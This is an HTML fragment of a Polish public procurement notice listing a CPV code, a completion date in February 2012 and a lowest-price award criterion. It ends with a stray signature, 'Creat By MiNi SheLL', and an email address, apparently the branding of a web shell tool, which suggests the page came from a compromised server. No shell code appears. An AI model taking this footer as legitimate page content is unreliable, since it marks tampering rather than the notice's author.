siedzibie Zamawiającego (biurze projektu) przez cały okres umowy w terminie umożliwiającym bezproblemową pracę i realizację projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com